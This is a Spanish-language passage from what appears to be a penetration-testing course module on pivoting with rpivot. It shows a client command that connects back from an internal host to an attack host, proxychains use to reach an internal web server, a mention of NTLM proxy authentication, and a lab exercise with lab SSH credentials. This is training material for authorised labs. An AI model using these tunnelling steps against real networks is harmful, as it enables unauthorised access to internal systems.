Rpivot es una herramienta de Reverse Proxy SOCKS escrita en Python para túneles SOCKS. Rpivot vincula una máquina dentro de una red corporativa a un servidor externo y expone el puerto local del cliente en el lado del servidor. Tomaremos el escenario siguiente, donde tenemos un servidor web en nuestra red interna ( 172.16.5.135) y queremos acceder a él utilizando el proxy rpivot.
Podemos iniciar nuestro servidor proxy rpivot SOCKS usando el siguiente comando para permitir que el cliente se conecte en el puerto 9999 y escuche en el puerto 9050 las conexiones de proxy pivot.
ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
Backconnecting to server 10.10.14.18 port 9999
Confirmación de que se ha establecido la conexión
New connection from host 10.129.202.64, source port 35226
Configuraremos proxychains para que pivote sobre nuestro servidor local en 127.0.0.1:9050 en nuestro host de ataque, que fue iniciado inicialmente por el servidor Python.
Finalmente, deberíamos poder acceder al servidor web en nuestro lado del servidor, que está alojado en la red interna de 172.16.5.0/23 en 172.16.5.135:80 usando Proxychains y Firefox.
Navegar al servidor web de destino con Proxychains
proxychains firefox-esr 172.16.5.135:80
De manera similar al proxy dinámico anterior, podría haber escenarios en los que no podamos pasar directamente a un servidor externo (host de ataque) en la nube. Algunas organizaciones tienen un proxy HTTP con autenticación NTLM configurado con el controlador de dominio. En tales casos, podemos proporcionar una opción de autenticación NTLM adicional para realizar la autenticación a través del proxy NTLM proporcionando un nombre de usuario y contraseña. En estos casos, podríamos usar client.py de rpivot de la siguiente manera:
Conexión a un servidor web mediante proxy HTTP y autenticación NTLM
Utilizando los conceptos que se enseñan en esta sección, conéctate al servidor web en la red interna. Envíe la flag de la página de inicio como respuesta.
SSH a 10.129.111.140 con usuario "ubuntu" y contraseña "HTB_@cademy_stdnt!"